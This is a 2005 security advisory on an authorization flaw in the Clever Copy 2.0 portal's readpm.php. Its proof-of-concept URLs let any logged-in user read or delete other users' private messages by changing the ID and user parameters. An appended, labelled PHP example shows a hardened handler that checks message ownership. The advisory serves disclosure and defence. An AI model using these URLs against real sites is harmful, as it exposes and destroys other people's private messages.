################################################
Clever Copy Unauthorized read & delete Private Messages
vendor url: http://clevercopy.bestdirectbuy.com
advisory: http://lostmon.blogspot.com/2005/07/clever-copy-unauthorized-read-delete.html
vendor notify: yes
exploit available: yes
################################################

Clever Copy is a free, fully scalable web site portal and news posting system. You can run it as a very simple blog or ramp it up to a full Content Management System.

Clever Copy contains a flaw that allows unauthorized reading and deletion of other users' private messages. The flaw is triggered when an authenticated user directly requests a specially crafted URL to gain unauthorized access to private messages.

############
versions
############

Clever Copy 2.0
Clever Copy 2.0a

###############
Solution
###############

No solution at this time !!

###################
Timeline
###################

Discovered: 25-07-2005
Vendor notify: 26-07-2005
Disclosure: 27-07-2005

###################
proof of concept
###################

First we must be logged in to access private messages, then go to this URL:

http://[victim]/readpm.php?op=read&ID=2&name=pruebas&user=waltrapass

or

http://[victim]/readpm.php?op=read&ID=2&user=waltrapass

and we see message 2 of user waltrapass :)

op= read or del
ID= ID of the message we want to view
name= username of the user who sent the private message (this is not necessary to view or delete a message)
user= username of the user whose PMs we are trying to view

To delete a message we can go to a similar URL:

http://[victim]/readpm.php?op=del&ID=2&name=pruebas&user=waltrapass

or

http://[victim]/readpm.php?op=del&ID=2&user=waltrapass

##################### €nd #############################

Thanks to estrella for being my light
Thanks to http://www.osvdb.org/

Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
Curiosity is what makes the mind move....
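The proof of concept shows the mailbox being selected by the client-supplied `user` and `ID` parameters. The following is an added example, not Clever Copy's code and not part of the advisory, of a handler that takes the mailbox owner from the server-side session instead. The function name `handle_pm`, the in-memory store and the account `mallory` are hypothetical.

```php
<?php
// Added example: hypothetical hardened handler, not Clever Copy's own code.
// Constructed sample store: message ID => mailbox owner, sender, body.
$store = [
    1 => ['owner' => 'mallory',    'from' => 'pruebas', 'body' => 'hello mallory'],
    2 => ['owner' => 'waltrapass', 'from' => 'pruebas', 'body' => 'hello waltrapass'],
];

/**
 * Handle op=read|del for one private message.
 * $sessionUser is the username the server authenticated (null if not logged in).
 * The query's "user" and "name" values are never used to decide access.
 */
function handle_pm(array $query, ?string $sessionUser, array &$store): array
{
    if ($sessionUser === null) {
        return [401, 'login required'];
    }
    $op = $query['op'] ?? '';
    if (!in_array($op, ['read', 'del'], true)) {
        return [400, 'bad op'];
    }
    $id = filter_var($query['ID'] ?? null, FILTER_VALIDATE_INT,
                     ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return [400, 'bad ID'];
    }
    // Same reply for "missing" and "not yours", so IDs cannot be probed.
    if (!isset($store[$id]) || $store[$id]['owner'] !== $sessionUser) {
        return [404, 'no such message'];
    }
    if ($op === 'del') {
        unset($store[$id]);
        return [200, 'deleted'];
    }
    return [200, $store[$id]['body']];
}

// Requests in the advisory's URL shape, issued while logged in as each account.
$cases = [
    ['mallory',    ['op' => 'read', 'ID' => '2', 'user' => 'waltrapass']],
    ['mallory',    ['op' => 'del',  'ID' => '2', 'user' => 'waltrapass']],
    ['waltrapass', ['op' => 'read', 'ID' => '2', 'user' => 'waltrapass']],
];
foreach ($cases as [$who, $query]) {
    [$status, $body] = handle_pm($query, $who, $store);
    printf("%-10s %s -> %d %s\n", $who, http_build_query($query), $status, $body);
}
```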